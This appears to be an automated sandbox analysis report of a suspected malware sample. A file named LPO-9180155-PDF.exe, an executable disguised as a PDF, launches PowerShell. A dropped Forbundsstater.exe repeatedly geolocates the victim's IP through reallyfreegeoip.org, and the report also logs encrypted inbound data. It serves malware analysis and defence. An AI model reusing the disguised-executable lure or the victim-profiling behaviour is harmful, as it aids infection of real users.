2024-07-25 08:13:53 UTC	8000	IN	Data Raw: 90 f5 61 99 25 0a 9f e8 a9 47 f8 37 59 ec 5c 30 41 06 96 60 b1 cb c3 f3 37 0e 54 68 f3 82 b3 23 85 b2 0c 72 38 c7 09 e3 de 7a 41 f9 3d e2 cb 26 d7 27 f8 63 27 95 41 2a 26 c6 1f 39 e9 b1 5e ca ca 01 f0 81 50 c2 85 7f ad 09 16 6f 28 ec 21 1b 10 71 16 b6 b8 07 e7 06 85 e2 41 29 cd ca f5 b8 5a 3e 6f 8a f7 79 e5 40 98 b4 38 ac 89 1d 4a c1 08 be 67 6e 98 e6 af 73 ac f3 fc 0e 53 ed 7d f5 91 51 95 95 e4 b5 da 1a 89 29 2a ee 4c e0 35 e5 58 85 ec 77 09 12 40 36 68 09 c1 73 c8 8c 25 62 e5 52 6f 8f 04 fd 12 58 7b 73 fe 94 73 48 32 d0 01 b5 1d 09 e7 a4 93 8d 3a 8e 68 df 93 c1 16 b7 12 83 8e e1 aa d0 b7 f6 13 74 de ce 38 36 4f 55 c1 1d 8c 1f 6b 01 c9 b4 31 69 bd 90 31 35 2e 0b 3a c4 8a d6 8f c1 a7 42 b1 57 4e f8 50 d3 85 bc 9d be 6a a2 23 a2 a7 56 3e c4 9b 06 d4 35 34 Data Ascii: a%G7Y\0A`7Th#r8zA=&'c'A&9^Po(!qA)Z>oy@8JgnsS}Q)L5Xw@6hs%bRoX{ssH2:ht86OUk1i15.:BWNPj#V>54
2024-07-25 08:13:53 UTC	8000	IN	Data Raw: 91 10 d5 1f 1a 70 34 90 8d 38 f4 32 c9 82 c2 2d 93 63 82 8f 49 2d c7 fd e4 59 74 ae f9 48 3a 4d 24 19 0e 87 0a 13 74 c4 a0 28 7c c3 f0 58 2c a3 7c 12 ab 8a f3 93 c0 c5 50 ad 5b 57 cd 47 b7 9a 82 81 b5 00 d5 32 ae b2 4a 29 db 81 df 73 9c 34 dd 0b 62 b2 f5 f0 0d 36 cd a5 9f 5e e6 14 70 a0 a3 9c 33 24 0a 75 25 c3 65 91 f7 e3 06 92 13 24 68 29 95 3d d3 e7 15 8d 07 39 38 c1 95 28 10 fb 72 c5 53 21 f3 20 50 5f 8c 5d 43 03 95 fd dd 91 ad 44 7f af 12 d1 63 4d cb 03 1c 94 74 3a 71 d1 37 31 a2 00 d2 87 47 5a 8e f2 4c ed 04 db 36 4a 8c 62 f9 25 dd fd 66 ce af 92 f7 2d 27 8e 3e d9 90 c4 cd 3e 73 b2 60 a9 e6 38 3e 03 85 89 62 09 89 3f d4 ec 3d 54 3b a4 72 42 fd 87 4f 66 3f 19 30 6e 22 05 ed 1e 15 87 af ad be 56 48 e4 62 fc d4 92 68 7b 11 92 4b 08 d8 72 ba 37 f0 66 01 Data Ascii: p482-cI-YtH:M$t(\|X,\|P[WG2J)s4b6^p3$u%e$h)=98(rS! P_]CDcMt:q71GZL6Jb%f-'>>s`8>b?=T;rBOf?0n"VHbh{Kr7f
2024-07-25 08:13:53 UTC	8000	IN	Data Raw: 5f e9 38 92 56 bc d4 3e c5 87 fb e5 35 3c 8d af ed 82 da da 33 46 f0 f2 a3 eb 3a 44 5b 93 fb fe 42 8f 5e 7d 1f a5 5b 22 06 55 21 0d 3e 64 62 5e a2 3d 05 32 12 45 39 74 8d 80 89 ba 37 ed b2 1f ec cc 3a 5c 68 10 b4 6e 08 a2 f8 fa 4d f0 6c 1a 5f 10 61 ba 99 0a 8f 6f e5 ba dc ae ec 44 b6 1b 7d c7 71 e0 f3 8a 99 82 eb b4 7e bb d8 64 a2 08 1b da 22 54 83 72 52 d9 3b 60 41 f8 22 9f d6 7d 86 d2 be a5 11 75 f1 c6 55 bc 48 d6 a8 20 fa 21 99 d1 18 5f 2b 2d 75 66 98 51 18 4c 93 8d 4e 4e 46 e8 46 be e6 d2 75 46 6f 80 ce d1 da 0d f1 1d 67 e0 0a 44 fd 83 a9 aa 4f 95 5a ad ad 9c 29 e5 8a 51 a5 af 44 3c 8f 89 1b 71 c2 40 8f 31 e9 59 df cd e0 81 a7 53 c9 f3 4f 1f 62 f7 72 0c cb 67 83 7c 65 f7 e8 8e ab 13 b8 1c fe a1 4b 4a 44 c0 0b 3a f5 1f a6 72 39 d7 66 21 b1 35 bf 80 e0 Data Ascii: _8V>5<3F:D[B^}["U!>db^=2E9t7:\hnMl_aoD}q~d"TrR;`A"}uUH !_+-ufQLNNFFuFogDOZ)QD<q@1YSObrg\|eKJD:r9f!5
2024-07-25 08:13:53 UTC	8000	IN	Data Raw: 10 c2 fb 30 26 ee 83 a9 b1 26 8c 4c b6 63 9e 4c e5 42 fa b5 8a 6c 08 e9 8a 78 6e d6 40 1b 62 cd 7b d5 13 e0 81 8b 0a 93 e8 81 1f de f7 8a 87 cb 67 83 61 63 ef fe 52 a1 13 05 12 8e d7 4b 4a 44 c0 0d 38 41 23 75 f4 85 d7 de 79 b1 35 bf 33 e0 f3 42 ee f1 c1 7e b5 04 a4 9e 9a 89 aa 5a c6 ae 28 da 13 41 a1 d0 62 5c 75 81 40 8a 40 d7 03 a5 a7 81 a6 02 80 6c a8 a0 fb bb 7d f2 58 34 f0 ce 99 db ff f3 d2 24 f5 56 44 e5 24 c0 0a 98 4c 0c 79 d0 5e 7a da 8f b8 7e ea ae 23 8c 9d 2f 86 18 7a 82 65 f9 0f d7 04 a1 2d e6 7f c3 e2 0a 4e 3d bb 6f 10 0b 15 83 40 0e 38 c9 92 9c 97 48 33 90 3e 6d 28 88 02 8d bb b8 57 e4 fc e8 cd eb 42 e0 d5 81 68 12 7c 18 bb 19 36 29 91 9e c2 b1 c7 d1 e0 0e 0d 86 6f 14 dc 4c 34 48 ed 96 f0 e8 bf f9 68 91 14 7a f3 4b 02 4d c9 de ec 4a e5 27 28 Data Ascii: 0&&LcLBlxn@b{gacRKJD8A#uy53B~Z(Ab\u@@l}X4$VD$Ly^z~#/ze-N=o@8H3>m(WBh\|6)oL4HhzKMJ'(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	59961	188.114.97.3	443	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:13:56 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:13:56 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:13:56 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23959 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Utx3FUMM5yt8CDEoj4tT2Gw13Dewl49EDx%2FfnQ2fFglsnxdcWpPdCGZa0WGAfOKkoiawlgfoNbkP8fleoVayr6ZA2eBjTe6oXeCQA70eRrAV%2FPqm2LwP3VjTa6z2TsoVmmSpOnAA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab18b4ef18cc8-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:13:56 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:13:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	59962	188.114.97.3	443	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:13:57 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-25 08:13:57 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:13:57 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23960 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MFNLvOaCTZkQZA1F4RGG8aOCVUnPKflpRCvSKhJsOWAOnipj0hPMfRf17iZuPXHVTtwZMgCQQf9Vti2LN34vCNJpz8NdQ4V138UhdfoC2rRK8dA%2FStLQXzTKeFA8GXE7%2BBBcBx1t"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab190cb4ec3f0-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:13:57 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:13:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	59964	188.114.97.3	443	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:13:58 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:13:58 UTC	710	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:13:58 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23961 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rKBC35yjcNu%2FmsGi478YaFHFrqW2PBurFEs%2BYN9n7sJwb%2F40g30dPAYckP%2FsL4%2BUt8hVnBmyAGczwctE2uuhMwlZUWsjeIFFQjCjjbztnrN2GGHcx5UIbxaTUKan06Vs4n1yhhQo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab19a8e9d9e04-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:13:58 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:13:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	59966	188.114.97.3	443	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:14:00 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:14:00 UTC	700	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:14:00 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23963 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tsADM6Ot9eTc7sVEYY0Y7fdIQoeHUmjVQLXTdYW6xVwTDHuz2UVZHMPtAWDl0yTzlByh8rgGQpygTZlO8B1eyxZ0lLYTKmjvpTFgu7rsQvvezcCAKfvcHGzNtjPKCADapnhUAEfA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab1a2d9ce6a53-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:14:00 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:14:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	59968	188.114.97.3	443	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:14:01 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:14:01 UTC	708	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:14:01 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23964 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OnkYDr%2BWO6tBgA4DnkmFXmZGuBaIMtLuCej0Uv9RQK3Y%2FuP8psxsYtL9xXcD%2Fn9Tr9tZzpTToKlxYbWpJLISylyLUUqKODRd9qmm%2BNuKeKXbxpijv9qvVDus6QeYs314wBBHvcYv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab1ab5c8741df-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:14:01 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:14:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	59970	188.114.97.3	443	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:14:02 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:14:02 UTC	714	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:14:02 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23965 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FIrM44%2BVerhWSuQ%2Bkl2nE924fsR5D%2Bn6EnanbtP8L39dEUik7w%2FWV1%2FyrM7mWFkybsARH9zv%2Ft67x11tRJHRmAk44muVIa4G4iLvUcMF6jDSIX6LRa6lAND31IFmVL6nOmeOIRoN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab1b3fdab7d0e-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:14:02 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:14:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	59972	188.114.97.3	443	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:14:04 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:14:04 UTC	702	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:14:04 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23967 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xluj0tMHKNh0Qyh2leqoAjhSLefJn5TgIYN4Vf%2FCmuGrHFOLuzGxVpbPtZsxnP6zt9Nm0fMYbSQbscmpeJUsGbdrBXTmJmF2NXd1TzOoUVDSl4ojuBG3KJV2PbOuql9ZzE1qN7VH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab1bc8956c468-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:14:04 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:14:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	59974	188.114.97.3	443	7032	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:14:05 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:14:05 UTC	700	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:14:05 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23968 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pn4tZhkw1gXRPnmj95Gk5L8ZOsRJsekl6E9Q86xrww1IHze2fTiF6CI4Gvq1iECzOR9vANO3WPBewnJSSDPVPcnXejpA6QJE8BCcRHupaohqeGbuwOOsuHFiL704CEW5QhpxSwK9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab1c52d8642a7-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:14:05 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:14:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	04:13:01
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LPO-9180155-PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LPO-9180155-PDF.exe"
Imagebase:	0x400000
File size:	878'240 bytes
MD5 hash:	3755CE1468A267B6E1084C8069B54A8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:13:04
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
